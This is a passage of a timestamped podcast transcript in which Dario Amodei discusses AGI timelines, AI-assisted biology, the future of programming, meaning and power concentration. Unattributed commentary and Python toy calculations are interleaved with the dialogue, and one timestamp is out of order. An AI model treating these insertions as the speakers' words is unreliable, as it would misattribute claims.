02:17:05.860 | possibly be the case that these things won't, won't change so fast.
02:17:09.140 | I think they don't understand these things.
02:17:11.500 | So what do you think is the timeline to where we achieve AGI, AKA powerful
02:17:18.300 | AI, AKA super useful AI? I'm going to start calling it that.
02:17:23.820 | It's a debate.
02:17:24.460 | It's a debate about naming.
02:17:26.420 | You know, on pure intelligence, it's smarter than a Nobel prize
02:17:31.660 | winner in every relevant discipline and all the things we've said.
02:17:34.300 | Modality. It can go and do stuff on its own for days, weeks, and do biology
02:17:39.900 | experiments, uh, on its own in one, you know what, let's just stick to biology.
02:17:44.380 | Cause yeah, you, you sold me on the whole biology and health section.
02:17:47.940 | That's so exciting from, um, from just, I was getting giddy
02:17:52.900 | from a scientific perspective.
02:17:54.620 | It made me want to be a biologist.
02:17:55.820 | It's almost, it's so, no, no, this was the feeling I had when I was writing it,
02:18:00.140 | that it's, it's like, this would be such a beautiful future if we can, if we can
02:18:04.700 | just, if we can just make it happen.
02:18:06.780 | Right.
02:18:07.020 | If we can just get the, get the landmines out of the way and, and, and, and make it
02:18:10.860 | happen, there's, there's so much, there's so much beauty and, and, and, and, and
02:18:16.940 | elegance and moral force behind it.
02:18:18.940 | If, if we can, if we can just, and it's something we should all be able to agree
02:18:23.020 | on, right?
02:18:23.580 | Like as much as we fight about, about all these political questions, is this something
02:18:28.780 | that could actually bring us together?
02:18:30.220 | Um, but you were asking when, when do you think. So, just
02:18:34.700 | putting numbers on it, you know, this, this is of course, the thing I've been
02:18:37.580 | grappling with for many years and I'm not, I'm not at all confident every time.
02:18:41.660 | If I say 2026 or 2027, there will be like a zillion, like people on Twitter who will
02:18:47.180 | be like, Hey, AI CEO said 2026, 2027, and it'll be repeated for like the next two
02:18:51.980 | years that like, this is definitely when I think it's going to happen.
02:18:54.780 | Um, so whoever's excerpting these clips will, will crop out
02:19:00.300 | the thing I just said and, and, and only say the thing I'm about to say.
02:19:03.660 | Um, but I'll just say it anyway.
02:19:05.660 | Um, uh, so, uh, if you extrapolate the curves that we've had so far, right.
02:19:12.460 | If, if you say, well, I don't know, we're starting to get to like PhD level.
02:19:16.700 | And, and last year we were at, um, uh, undergraduate level and the year before we
02:19:21.820 | were at like the level of a high school student.
02:19:24.140 | Again, you can, you can quibble with what tasks and for what we're still missing
02:19:28.700 | modalities, but those are being added.
02:19:30.380 | Like computer use was added.
02:19:31.980 | Like image generation has been added.
02:19:34.940 | If you just kind of like, and this is totally unscientific, but if you just kind
02:19:39.660 | of like eyeball the rate at which these capabilities are increasing, it does make
02:19:44.780 | you think that we'll get there by 2026 or 2027.
02:19:48.380 | Again, lots of things could derail it.
02:19:51.260 | We could run out of data.
02:19:52.460 | You know, we might not be able to scale clusters as much as we want.
02:19:56.700 | Like, you know, maybe Taiwan gets blown up or something and, you know, then we
02:20:00.380 | can't produce as many GPUs as we want.
02:20:02.380 | So there, there are all kinds of things that could, could derail the whole process.
02:20:07.100 | So I don't fully believe the straight line extrapolation, but if you believe
02:20:11.180 | the straight line extrapolation, you'll, you'll, we'll get there in 2026 or 2027.
02:20:16.300 | I think the most likely is that there's some mild delay relative to that.
02:20:20.300 | Um, I don't know what that delay is, but I think it could happen on schedule.
02:20:24.140 | I think there could be a mild delay.
02:20:25.660 | I think there are still worlds where it doesn't happen in, in a hundred years.
02:20:29.100 | But the number of those worlds is rapidly decreasing.
02:20:32.460 | We are rapidly running out of truly convincing blockers, truly compelling
02:20:37.260 | reasons why this will not happen in the next few years.
02:20:39.660 | There were a lot more in 2020.
02:20:41.660 | Um, although my, my guess, my hunch at that time was that we'll make
02:20:45.340 | it through all those blockers.
02:20:46.380 | So sitting as someone who has seen most of the blockers cleared out of the way,
02:20:50.700 | I kind of suspect my hunch, my suspicion is that the rest of them will not block us.
02:20:55.340 | Uh, but.
02:20:56.060 | You know, look, look, look at the end of the day, like, I don't want to represent
02:21:00.300 | this as a scientific prediction.
02:21:02.140 | People call them scaling laws.
02:21:03.660 | That's a misnomer.
02:21:04.540 | Like Moore's law is a misnomer.
02:21:07.020 | Moore's law, scaling laws,
02:21:08.300 | they're not laws of the universe.
02:21:09.740 | They're empirical regularities.
02:21:11.500 | I am going to bet in favor of them continuing, but I'm not certain of that.
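For concreteness, here is the "eyeball extrapolation" written out as a toy straight-line fit. The numeric levels assigned to the milestones (high school, undergraduate, PhD) and the threshold chosen for "powerful AI" are made-up illustrative assumptions, exactly as unscientific as Dario says.

```python
# Unscientific straight-line extrapolation of "capability level" vs. year.
# Levels are arbitrary labels: 1 = high school, 2 = undergraduate, 3 = PhD;
# assume "powerful AI" sits a couple of notches higher, at level 5.
years = [2022, 2023, 2024]
levels = [1, 2, 3]

# Ordinary least-squares fit of level = slope * year + intercept (closed form).
n = len(years)
mean_x = sum(years) / n
mean_y = sum(levels) / n
num = sum((x - mean_x) * (y - mean_y) for x, y in zip(years, levels))
den = sum((x - mean_x) ** 2 for x in years)
slope = num / den
intercept = mean_y - slope * mean_x

target_level = 5
crossing_year = (target_level - intercept) / slope
print(f"fitted slope: {slope:.2f} levels/year")
print(f"level {target_level} reached around {crossing_year:.0f}")
```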
02:21:15.340 | So you extensively described sort of the compressed 21st century, how AGI will help.
02:21:21.660 | Uh, set forth a chain of breakthroughs in biology and medicine that help us in all
02:21:28.620 | these kinds of ways that I mentioned.
02:21:29.980 | So how do you think, what are the early steps it might do?
02:21:33.180 | And by the way, I asked Claude for good questions to ask you, and Claude told me, uh, to ask:
02:21:39.900 | what do you think a typical day for a biologist working with AGI will look like in this future?
02:21:45.740 | Yeah.
02:21:46.220 | Yeah.
02:21:46.780 | Claude is curious.
02:21:47.660 | Let me, well, let me start with your first questions and then I'll, then I'll answer
02:21:50.460 | that. Claude wants to know what's in his future, right?
02:21:52.620 | Exactly.
02:21:53.120 | Who am I going to be working with?
02:21:55.500 | Exactly.
02:21:56.060 | Um, so I think one of the things I went hard on when I went hard on in the essay is let
02:22:01.900 | me go back to this idea of, because it's, it's really had, had an, you know, had an
02:22:06.060 | impact on me, this idea that within large organizations and systems, there end up being
02:22:11.980 | a few people or a few new ideas who kind of cause things to go in a different direction
02:22:17.180 | than they would have before, who kind of disproportionately affect the trajectory.
02:22:22.300 | There's a bunch of kind of the same thing going on, right?
02:22:24.860 | If you think about the health world, there's like, you know, trillions of dollars to pay
02:22:29.020 | out Medicare and, you know, other health insurance.
02:22:31.660 | And then the NIH is a hundred billion.
02:22:33.820 | And then if I think of like the, the few things that have really revolutionized anything,
02:22:37.740 | it could be encapsulated in a small, small fraction of that.
02:22:41.020 | And so when I think of like, where will AI have an impact?
02:22:43.980 | I'm like, can AI turn that small fraction into a much larger fraction and raise its
02:22:48.460 | quality?
02:22:49.180 | And within biology, my experience within biology is that the biggest problem of biology is
02:22:56.220 | that you can't see what's going on.
02:22:59.020 | You, you have very little ability to see what's going on and even less ability to change it,
02:23:04.300 | right?
02:23:04.620 | What you have is this, like, like from this, you have to infer that there's a bunch of
02:23:10.460 | cells that within each cell is, you know, three billion base pairs of DNA built according
02:23:17.820 | to a genetic code.
02:23:18.940 | And, you know, there are all these processes that are just going on without any ability
02:23:24.700 | of us as, you know, unaugmented humans to affect it.
02:23:28.540 | These cells are dividing most of the time that's healthy, but sometimes that process
02:23:33.180 | goes wrong and that's cancer.
02:23:35.580 | The cells are aging.
02:23:37.500 | Your skin may change color, develop wrinkles as you, as you age.
02:23:42.140 | And all of this is determined by these processes, all these proteins being produced, transported
02:23:47.180 | to various parts of the cells, binding to each other.
02:23:50.380 | And in our initial state about biology, we didn't even know that these cells existed.
02:23:55.020 | We had to invent microscopes to observe the cells.
02:23:57.900 | We had to, we had to invent more powerful microscopes to see, you know, below the level
02:24:03.740 | of the cell to the level of molecules.
02:24:05.820 | We had to invent x-ray crystallography to see the DNA.
02:24:09.100 | We had to invent gene sequencing to read the DNA.
02:24:12.380 | Now, you know, we had to invent protein folding technology to, you know, to predict how it
02:24:17.180 | would fold and how they bind and how these things bind to each other.
02:24:21.260 | You know, we had to, we had to invent various techniques for now we can edit the DNA as
02:24:27.020 | of, you know, with CRISPR as of the last 12 years.
02:24:29.980 | So the whole history of biology, a whole big part of the history is basically our ability
02:24:37.660 | to read and understand what's going on and our ability to reach in and selectively change
02:24:42.460 | things.
02:24:42.780 | And my view is that there's so much more we can still do there, right?
02:24:48.060 | You can do CRISPR, but you can do it for your whole body.
02:24:50.700 | Let's say I want to do it for one particular type of cell, and I want the rate of targeting
02:24:56.860 | the wrong cell to be very low.
02:24:58.780 | That's still a challenge.
02:24:59.820 | That's still things people are working on.
02:25:01.740 | That's what we might need for gene therapy for certain diseases.
02:25:04.700 | And so the reason I'm saying all of this, and it goes beyond, you know, beyond this
02:25:10.140 | to, you know, to gene sequencing, to new types of nanomaterials for observing what's going
02:25:15.340 | on inside cells for, you know, antibody drug conjugates.
02:25:19.420 | The reason I'm saying all this is that this could be a leverage point for the AI systems,
02:25:24.620 | right?
02:25:25.180 | That the number of such inventions, it's in the mid-double digits or something.
02:25:30.940 | You know, mid-double digits, maybe low triple digits over the history of biology.
02:25:35.100 | Let's say I have a million of these AIs.
02:25:37.020 | Like, you know, can they discover a thousand, you know, working together, can they discover
02:25:40.540 | thousands of these very quickly?
02:25:42.460 | And does that provide a huge lever?
02:25:45.020 | Instead of trying to leverage the, you know, $2 trillion a year we spend on, you know,
02:25:49.020 | Medicare or whatever, can we leverage the $1 billion a year that's, you know, that's
02:25:53.020 | spent to discover, but with much higher quality?
02:25:55.420 | And so what is it like, you know, being a scientist that works with an AI system?
02:26:02.620 | The way I think about it actually is, well, so I think in the early stages, the AIs are
02:26:10.380 | going to be like grad students.
02:26:12.060 | You're going to give them a project.
02:26:13.820 | You're going to say, you know, I'm the experienced biologist.
02:26:16.700 | I've set up the lab.
02:26:18.140 | The biology professor or even the grad students themselves will say, here's what you can do
02:26:25.500 | with an AI, you know, like AI system.
02:26:28.220 | I'd like to study this.
02:26:29.660 | And, you know, the AI system, it has all the tools.
02:26:31.740 | It can like look up all the literature to decide what to do.
02:26:35.100 | It can look at all the equipment.
02:26:36.380 | It can go to a website and say, hey, I'm going to go to, you know, Thermo Fisher or, you
02:26:40.300 | know, whatever the lab equipment company is, the dominant lab equipment company is today.
02:26:44.700 | In my time it was Thermo Fisher.
02:26:48.140 | You know, I'm going to order this new equipment to do this.
02:26:51.100 | I'm going to run my experiments.
02:26:52.700 | I'm going to, you know, write up a report about my experiments.
02:26:55.980 | I'm going to, you know, inspect the images for contamination.
02:26:59.740 | I'm going to decide what the next experiment is.
02:27:02.220 | I'm going to like write some code and run a statistical analysis.
02:27:06.060 | All the things a grad student would do, there will be a computer with an AI that like the
02:27:10.140 | professor talks to every once in a while.
02:27:11.820 | And it says, this is what you're going to do today.
02:27:13.660 | The AI system comes to it with questions.
02:27:15.660 | When it's necessary to run the lab equipment, it may be limited in some ways.
02:27:19.900 | It may have to hire a human lab assistant to, you know, to do the experiment and explain
02:27:24.940 | how to do it.
02:27:25.660 | Or it could, you know, it could use advances in lab automation that are gradually being
02:27:29.980 | developed over, have been developed over the last decade or so and will continue to be,
02:27:35.980 | will continue to be developed.
02:27:37.260 | And so it'll look like there's a human professor and a thousand AI grad students.
02:27:41.660 | And, you know, if you, if you go to one of these Nobel prize winning biologists or so,
02:27:45.820 | you'll say, okay, well, you, you know, you had like 50 grad students, well, now you have
02:27:49.340 | a thousand and they're, they're, they're smarter than you are, by the way.
02:27:52.300 | Then I think at some point it'll flip around where the, you know, the AI systems will,
02:27:57.660 | you know, will, will be the PIs, will be the leaders and, and, and, you know, they'll be,
02:28:01.420 | they'll be ordering humans or other AI systems around.
02:28:04.540 | So I think that's how it'll work on the research side.
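A minimal sketch of the "AI grad student" loop described above, just to make the workflow concrete. Every function here (the planning step, the experiment runner, the notebook) is a hypothetical placeholder, not an existing API or Anthropic tooling.

```python
# Hypothetical research-assistant loop: the "professor" sets a goal, and the AI
# iterates on planning, running experiments (via lab automation or a human
# lab assistant), analyzing results, and writing them up.
from dataclasses import dataclass, field

@dataclass
class LabNotebook:
    goal: str
    entries: list = field(default_factory=list)

def propose_next_step(notebook: LabNotebook) -> str:
    # Placeholder for a model call that reads the notebook and plans.
    return f"experiment #{len(notebook.entries) + 1} toward: {notebook.goal}"

def run_experiment(plan: str) -> dict:
    # Placeholder for lab automation or instructions handed to a human assistant.
    return {"plan": plan, "result": "simulated measurement", "contaminated": False}

def research_loop(goal: str, max_rounds: int = 3) -> LabNotebook:
    notebook = LabNotebook(goal=goal)
    for _ in range(max_rounds):
        plan = propose_next_step(notebook)      # decide what to do next
        outcome = run_experiment(plan)          # run it in the physical world
        if outcome["contaminated"]:
            continue                            # discard and redesign
        notebook.entries.append(outcome)        # write up the result
    return notebook

if __name__ == "__main__":
    nb = research_loop("characterize a candidate gene-editing delivery mechanism")
    for entry in nb.entries:
        print(entry["plan"], "->", entry["result"])
```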
02:28:06.460 | And they would be the inventors of a CRISPR type technology.
02:28:08.780 | They would be the inventors of, of a CRISPR type technology.
02:28:12.220 | And then I think, you know, as I say in the essay, we'll want to turn, turn, probably
02:28:17.660 | turning loose is the wrong, the wrong term, but we'll want to, we'll want to harness the
02:28:22.300 | AI systems to improve the clinical trial system as well.
02:28:26.940 | There's some amount of this that's regulatory, that's a matter of societal decisions and
02:28:30.860 | that'll be harder, but can we get better at predicting the results of clinical trials?
02:28:36.300 | Can we get better at statistical design so that what, you know, clinical trials that
02:28:41.340 | used to require, you know, 5,000 people and therefore, you know, needed a hundred million
02:28:46.460 | dollars in a year to enroll them, now they need 500 people in two months to enroll them.
02:28:51.500 | That's where we should start.
02:28:53.500 | And, you know, can we increase the success rate of clinical trials by doing things in
02:28:59.740 | animal trials that we used to do in clinical trials and doing things in simulations that
02:29:03.260 | we used to do in animal trials?
02:29:04.540 | Again, we won't be able to simulate it all, AI is not God, but, you know, can we shift
02:29:11.180 | the curve substantially and radically?
02:29:13.580 | So, I don't know, that would be my picture.
02:29:15.660 | Doing it in vitro and doing it, I mean, you're still slowed down, it still takes time, but
02:29:20.300 | you can do it much, much faster.
02:29:21.420 | Yeah, yeah, yeah.
02:29:22.060 | Can we just one step at a time and can that add up to a lot of steps?
02:29:26.620 | Even though we still need clinical trials, even though we still need laws, even though
02:29:31.340 | the FDA and other organizations will still not be perfect, can we just move everything
02:29:35.420 | in a positive direction?
02:29:36.700 | And when you add up all those positive directions, do you get everything that was going to happen
02:29:40.940 | from here to 2100 instead happens from 2027 to 2032 or something?
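On the statistical-design point (trials shrinking from roughly 5,000 participants to 500), a standard two-arm sample-size formula shows where such a reduction would have to come from: required sample size scales with outcome variance divided by the square of the detectable effect, so better endpoints and better patient selection compound quickly. The numbers below are illustrative only, not anything from the essay.

```python
# Approximate per-arm sample size for comparing two means:
#   n = 2 * (z_alpha/2 + z_beta)^2 * sigma^2 / delta^2
# with the usual z-values for 5% two-sided significance and 80% power.
Z_ALPHA = 1.96  # two-sided alpha = 0.05
Z_BETA = 0.84   # power = 0.80

def per_arm_sample_size(sigma: float, delta: float) -> int:
    n = 2 * (Z_ALPHA + Z_BETA) ** 2 * sigma ** 2 / delta ** 2
    return int(n + 0.999)  # round up

# Illustrative numbers: a noisy endpoint with a small detectable effect...
print("baseline trial, per arm:", per_arm_sample_size(sigma=1.0, delta=0.1))
# ...versus lower-variance endpoints and a larger reliably-targeted effect,
# the kind of shift better prediction and design are hypothesized to buy.
print("improved design, per arm:", per_arm_sample_size(sigma=0.7, delta=0.22))
```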
02:29:45.900 | Another way that I think the world might be changing with AI, even today, but moving towards
02:29:53.420 | this future of the powerful, super useful AI, is programming.
02:29:58.380 | So, how do you see the nature of programming?
02:30:02.220 | Because it's so intimate to the actual act of building AI, how do you see that changing
02:30:06.860 | for us humans?
02:30:08.380 | I think that's going to be one of the areas that changes fastest for two reasons.
02:30:12.860 | One, programming is a skill that's very close to the actual building of the AI.
02:30:17.900 | So, the farther a skill is from the people who are building the AI, the longer it's going
02:30:24.380 | to take to get disrupted by the AI, right?
02:30:26.620 | Like, I truly believe that AI will disrupt agriculture.
02:30:29.980 | Maybe it already has in some ways, but that's just very distant from the folks who are building the AI.
02:30:35.100 | And so, I think it's going to take longer.
02:30:36.780 | But programming is the bread and butter of a large fraction of the employees who work
02:30:41.340 | at Anthropic and at the other companies.
02:30:43.500 | And so, it's going to happen fast.
02:30:45.420 | The other reason it's going to happen fast is with programming, you close the loop.
02:30:48.860 | Both when you're training the model and when you're applying the model, the idea that the
02:30:52.940 | model can write the code means that the model can then run the code and then see the results
02:30:58.940 | and interpret it back.
02:31:00.220 | And so, it really has an ability, unlike hardware, unlike biology, which we just discussed, the
02:31:05.980 | model has an ability to close the loop.
02:31:07.740 | And so, I think those two things are going to lead to the model getting good at programming
02:31:12.940 | very fast.
02:31:14.060 | As I saw on typical real-world programming tasks, models have gone from 3% in January
02:31:21.580 | of this year to 50% in October of this year.
02:31:25.340 | So, we're on that S-curve where it's going to start slowing down soon because you can
02:31:30.060 | only get to 100%.
02:31:30.860 | But I would guess that in another 10 months, we'll probably get pretty close.
02:31:36.940 | We'll be at least 90%.
02:31:38.140 | So again, I would guess, I don't know how long it'll take, but I would guess again,
02:31:43.580 | 2026, 2027, Twitter people who crop out these numbers and get rid of the caveats, like,
02:31:52.060 | I don't know, I don't like you, go away.
02:31:54.620 | I would guess that the kind of task that the vast majority of coders do, AI can probably,
02:32:02.620 | if we make the task very narrow, like just write code, AI systems will be able to do
02:32:10.780 | that.
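As a toy check on that S-curve intuition, you can pin a logistic curve to the two figures quoted, roughly 3% in January and 50% in October, and ask when it would cross 90%. A two-point fit proves nothing, but it lands within the "at least 90% in another 10 months" guess.

```python
import math

# Fit a logistic curve p(t) = 1 / (1 + exp(-r * (t - t0))) through two points
# by working in log-odds (logit) space, then ask when it crosses 90%.
def logit(p: float) -> float:
    return math.log(p / (1 - p))

# Months measured from January; the two data points quoted in conversation.
t1, p1 = 0.0, 0.03   # January: ~3% of tasks solved
t2, p2 = 9.0, 0.50   # October: ~50%

r = (logit(p2) - logit(p1)) / (t2 - t1)   # growth rate in logit units/month
t0 = t2 - logit(p2) / r                   # midpoint (where p = 50%)

months_to_90 = t0 + logit(0.90) / r
print(f"growth rate: {r:.2f} logits/month")
print(f"crosses 90% about {months_to_90 - t2:.1f} months after October")
```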
02:32:11.020 | Now that said, I think comparative advantage is powerful.
02:32:13.900 | We'll find that when AIs can do 80% of a coder's job, including most of it that's
02:32:19.980 | literally like write code with a given spec, we'll find that the remaining parts of the
02:32:24.380 | job become more leveraged for humans, right?
02:32:27.020 | Humans will, they'll be more about like high-level system design or looking at the app and like,
02:32:33.740 | is it architected well?
02:32:35.260 | And the design and UX aspects, and eventually AI will be able to do those as well, right?
02:32:40.860 | That's my vision of the powerful AI system.
02:32:43.980 | But I think for much longer than we might expect, we will see that small parts of the
02:32:52.620 | job that humans still do will expand to fill their entire job in order for the overall
02:32:57.740 | productivity to go up.
02:32:58.860 | That's something we've seen.
02:33:00.860 | You know, it used to be that, you know, writing and editing letters was very difficult and
02:33:06.220 | like writing the print was difficult.
02:33:07.500 | Well, as soon as you had word processors and then computers and it became easy to produce
02:33:14.060 | work and easy to share it, then that became instant and all the focus was on the ideas.
02:33:19.580 | So this logic of comparative advantage that expands tiny parts of the tasks to large parts
02:33:26.620 | of the tasks and creates new tasks in order to expand productivity, I think that's going
02:33:31.340 | to be the case.
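A small worked example of that expansion effect, with made-up numbers in the spirit of Amdahl's law: if AI makes the 80% of a coding job that is "just write the code" ten times faster, overall throughput rises about 3.6x, while the remaining 20% of the old job now fills roughly 70% of the human's time.

```python
# Amdahl's-law style arithmetic for "AI does 80% of the job 10x faster".
automatable_fraction = 0.8   # part of the job AI can take over (assumption)
speedup = 10.0               # how much faster AI does that part (assumption)

old_time = 1.0
new_time = automatable_fraction / speedup + (1 - automatable_fraction)
productivity_gain = old_time / new_time
human_share_of_new_time = (1 - automatable_fraction) / new_time

print(f"overall productivity gain: {productivity_gain:.1f}x")
print(f"share of remaining work that is the old 'human 20%': {human_share_of_new_time:.0%}")
```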
02:33:31.980 | Again, someday AI will be better at everything and that logic won't apply.
02:33:36.140 | And then we all have, you know, humanity will have to think about how to collectively deal
02:33:41.500 | with that.
02:33:41.900 | And we're thinking about that every day.
02:33:43.580 | And, you know, that's another one of the grand problems to deal with aside from misuse and
02:33:48.620 | autonomy.
02:33:49.180 | And, you know, we should take it very seriously.
02:33:51.260 | But I think in the near term and maybe even in the medium term, like medium term, like
02:33:55.820 | two, three, four years, you know, I expect that humans will continue to have a huge role
02:34:00.940 | and the nature of programming will change.
02:34:02.540 | But programming as a role, programming as a job will not change.
02:34:05.900 | It'll just be less writing things line by line and it'll be more macroscopic.
02:34:09.980 | And I wonder what the future of IDEs looks like.
02:34:12.780 | So the tooling of interacting with AI systems, this is true for programming and also probably
02:34:16.860 | true for in other contexts, like computer use, but maybe domain specific, like we mentioned
02:34:21.740 | biology, it probably needs its own tooling about how to be effective.
02:34:25.500 | And then programming needs its own tooling.
02:34:27.820 | Is Anthropic going to play in that space of also tooling potentially?
02:34:30.700 | I'm absolutely convinced that powerful IDEs, that there's so much low hanging fruit to
02:34:39.420 | be grabbed there that, you know, right now it's just like you talk to the model and it
02:34:43.660 | talks back.
02:34:44.300 | But, but look, I mean, IDEs are great at kind of lots of static analysis of, you know, so
02:34:52.220 | much is possible with kind of static analysis, like many bugs you can find without even running
02:34:57.340 | the code.
02:34:58.300 | Then, you know, IDEs are good for running particular things, organizing your code, measuring
02:35:04.540 | coverage of unit tests.
02:35:05.660 | Like there's so much that's been possible with normal, with normal IDEs.
02:35:10.220 | Now you add something like, well, the model now, you know, the model can now like write
02:35:15.900 | code and run code.
02:35:17.420 | Like, I am absolutely convinced that over the next year or two, even if the quality
02:35:21.580 | of the models didn't improve, that there would be enormous opportunity to enhance people's
02:35:26.140 | productivity by catching a bunch of mistakes, doing a bunch of grunt work for people, and
02:35:31.180 | that we haven't even scratched the surface.
02:35:33.020 | Anthropic itself, I mean, you can't say, you know, no, you know, it's hard to say what
02:35:38.860 | will happen in the future.
02:35:40.220 | Currently, we're not trying to make such IDEs ourselves.
02:35:43.340 | Rather, we're powering the companies like Cursor or like Cognition or some of the other,
02:35:49.260 | you know, Expo in the security space, you know, others that I can mention as well that
02:35:56.860 | are building such things themselves on top of our API.
02:35:59.500 | And our view has been, let a thousand flowers bloom.
02:36:02.860 | We don't internally have the, you know, the resources to try all these different things.
02:36:09.020 | Let's let our customers try it.
02:36:10.460 | And, you know, we'll see who succeeds and maybe different customers will succeed in
02:36:14.700 | different ways.
02:36:16.220 | So I both think this is super promising.
02:36:18.540 | And, you know, it's not, it's not, it's not something, you know, Anthropic isn't, isn't
02:36:23.020 | eager to, at least right now, compete with all our customers in this space and maybe
02:36:26.860 | never.
02:36:27.420 | Yeah.
02:36:27.580 | It's been interesting to watch Cursor try to integrate Claude successfully because there's,
02:36:30.860 | it's actually, I mean, fascinating how many places it can help the programming experience.
02:36:35.740 | It's not trivial.
02:36:36.540 | It is, it is really astounding.
02:36:38.300 | I feel like, you know, as a CEO, I don't get to program that much.
02:36:41.100 | And I feel like if six months from now I go back, it'll be completely unrecognizable to me.
02:36:45.340 | Exactly.
02:36:45.820 | Um, so in this world with super powerful AI, uh, that's increasingly automated, what's
02:36:52.700 | the source of meaning for us humans?
02:36:54.860 | You know, work is a source of deep meaning for many of us.
02:36:58.540 | So what do we, uh, where do we find the meaning?
02:37:01.180 | This is something that I've, I've written about a little bit in the essay, although
02:37:04.860 | I, I actually, I give it a bit short shrift, not for any, um, not for any principled reason,
02:37:09.980 | but this essay, if you believe it was originally going to be two or three pages, I was going
02:37:14.700 | to talk about it at all hands.
02:37:16.140 | And the reason I, I realized it was an important, underexplored topic
02:37:21.500 | is that I just kept writing things and I was just like, oh man, I can't do this justice.
02:37:25.660 | And so the thing ballooned to like 40 or 50 pages.
02:38:28.460 | And then when I got to the work and meaning section, I'm like, oh man, this is going
02:37:31.100 | to be a hundred pages.
02:37:31.980 | Like, I'm going to have to write a whole other essay about that.
02:37:34.700 | But meaning is actually interesting because you think about like the life that someone
02:37:39.180 | lives or something, or like, you know, like, you know, let's say you were to put me in,
02:37:42.620 | like, I don't know, like a simulated environment or something where like, um, you know, like
02:37:46.940 | I have a job and I'm trying to accomplish things and I don't know, I like do that for
02:37:50.940 | 60 years.
02:37:51.660 | And then, then you're like, oh, oh, like, oops, this was, this was actually all a game.
02:37:55.500 | Right.
02:37:55.820 | Does that really kind of rob you of the meaning of the whole thing?
02:37:58.380 | You know, like I still made important choices, including moral choices.
02:38:02.140 | I still sacrificed.
02:38:03.660 | I still had to kind of gain all these skills or, or, or just like a similar exercise, you
02:38:08.620 | know, think back to like, you know, one of the historical figures who, you know, discovered
02:38:12.300 | electromagnetism or relativity or something, if you told them, well, actually 20,000 years
02:38:17.820 | ago, some, some alien on, you know, some alien on this planet discovered this before, before
02:38:23.180 | you did, um, does that, does that rob the meaning of the discovery?
02:38:26.460 | It, it doesn't really seem like it to me.
02:38:28.780 | Right.
02:38:29.100 | It seems like the process is what, is what matters and how it shows who you are as a
02:38:33.900 | person along the way and, you know, how you relate to other people and like the decisions
02:38:38.460 | that you make along the way.
02:38:40.060 | Those are, those are consequential.
02:38:41.980 | Um, you know, I, I could imagine if we handle things badly in an AI world, we could set
02:38:47.260 | things up where people don't have any long-term source of meaning or any, but, but that's,
02:38:52.460 | that's more a choice, a set of choices we make.
02:38:55.020 | That's more a set of the architecture of a society with these powerful models.
02:39:00.460 | If we, if we design it badly and for shallow things, then, then that might happen.
02:39:05.020 | I would also say that, you know, most people's lives today, while admirably, you know, they
02:39:10.380 | work very hard to find meaning in those lives, like, look, you know, we, who are privileged
02:39:16.140 | and who are developing these technologies, we should have empathy for people, not just
02:39:20.540 | here, but in the rest of the world, who, you know, spend a lot of their time kind of
02:39:24.860 | scraping by to, to like survive, assuming we can distribute the benefits of
02:39:30.460 | these technology, of this technology to everywhere, like their lives are going to get a hell of
02:39:35.420 | a lot better.
02:39:36.380 | Um, and, uh, you know, meaning will be important to them as it is important to them now, but,
02:39:41.420 | but, you know, we should not forget the importance of that.
02:39:44.140 | And, and, you know, that, that, uh, the idea of meaning as, as, as, as kind of the only
02:39:48.620 | important thing is in some ways, an artifact of, of a small subset of people who have,
02:39:53.980 | who have been, uh, economically fortunate.
02:39:56.540 | But I, you know, I think all that said, I, you know, I think a world is possible with
02:40:00.780 | powerful AI that not only has as much meaning for, for everyone, but that has, that has
02:40:07.100 | more meaning for everyone, right.
02:40:08.380 | That can, can allow, um, can allow everyone to see worlds and experiences that it was
02:40:15.100 | either possible for no one to see or, or possible for, for very few people to experience.
02:40:20.940 | Um, so I, I am optimistic about meaning.
02:40:25.100 | I worry about economics and the concentration of power.
02:40:29.500 | That's actually what I worry about more.
02:40:31.420 | Um, I, I worry about how do we make sure that that fair world reaches everyone.
02:40:37.580 | Um, when things have gone wrong for humans, they've often gone wrong because humans mistreat
02:40:42.700 | other humans.
02:40:43.740 | Uh, that, that is maybe in some ways even more than the autonomous risk of AI or the
02:40:49.180 | question of meaning that, that is the thing I worry about most, um, the, the concentration
02:40:55.420 | of power, the abuse of power, um, structures like autocracies and dictatorships where a
02:41:03.500 | small number of people exploits a large number of people.
02:41:05.980 | I'm very worried about that.
02:41:07.900 | And AI increases the amount of power in the world.
02:41:12.060 | And if you concentrate that power and abuse that power, it can do immeasurable damage.
02:41:16.860 | It's very frightening.
02:41:18.060 | It's very, it's very frightening.
02:41:19.820 | Well, I encourage people, highly encourage people to read the full essay.
02:41:23.660 | That should probably be a book or a sequence of essays, uh, because it does paint a very
02:41:29.260 | specific future.
02:41:30.140 | I could tell the later sections got shorter and shorter because you started to probably
02:41:33.980 | realize that this is going to be a very long essay.
02:41:36.460 | I, one, I realized it would be very long and two, I'm very aware of, and very much try
02:41:41.980 | to avoid, um, you know, just, just being a, I don't know, I don't know what the term for
02:41:46.380 | it is, but one, one of these people who's kind of overconfident and has an opinion on
02:41:50.300 | everything and kind of says, says a bunch of stuff and isn't, isn't an expert.
02:41:54.060 | I very much tried to avoid that, but I have to admit once I got the biology sections,
02:41:58.300 | like I wasn't an expert.
02:41:59.500 | And so as much as I expressed uncertainty, uh, probably I said some, a bunch of things
02:42:04.220 | that were embarrassing or wrong.
02:42:06.060 | Well, I was excited for the future you painted.
02:42:08.140 | And, uh, thank you so much for working hard to build that future.
02:42:11.180 | And thank you for talking to me.
02:42:12.540 | Thanks for having me.
02:42:13.500 | I just, I just hope we can get it right and, and make it real.
02:42:16.700 | And if there's one message I want to, I want to send, it's that to get all this stuff,
02:42:22.060 | right, to make it real, we, we both need to build the technology, build the, you know,
02:42:27.340 | the companies, the economy around using this technology positively, but we also need to
02:42:31.660 | address the risks because they're, they're, those risks are in our way.
02:42:35.580 | They're, they're landmines on, on the way from here to there.
02:42:38.860 | And we have to defuse those landmines if we want to get there.
02:42:41.580 | It's a balance like all things in life.
02:42:43.420 | Like all things.
02:42:44.300 | Thank you.
02:42:44.800 | Thanks for listening to this conversation with Dario Amodei.
02:42:48.140 | And now, dear friends, here's Amanda Askell.
02:42:51.820 | You are a philosopher by training.
02:42:55.420 | So what sort of questions did you find fascinating through your journey in philosophy in Oxford
02:43:00.700 | and NYU, and then switching over to the AI problems at OpenAI and Anthropic?
02:43:07.580 | I think philosophy is actually a really good subject if you are kind of fascinated with
02:43:11.820 | everything.
02:43:12.320 | So, because there's a philosophy of everything, you know, so if you do philosophy of mathematics
02:43:16.860 | for a while, and then you decide that you're actually really interested in chemistry, you
02:43:19.980 | can do philosophy of chemistry for a while.
02:43:21.740 | You can move into ethics or philosophy of politics.
02:43:24.700 | I think towards the end, I was really interested in ethics primarily.
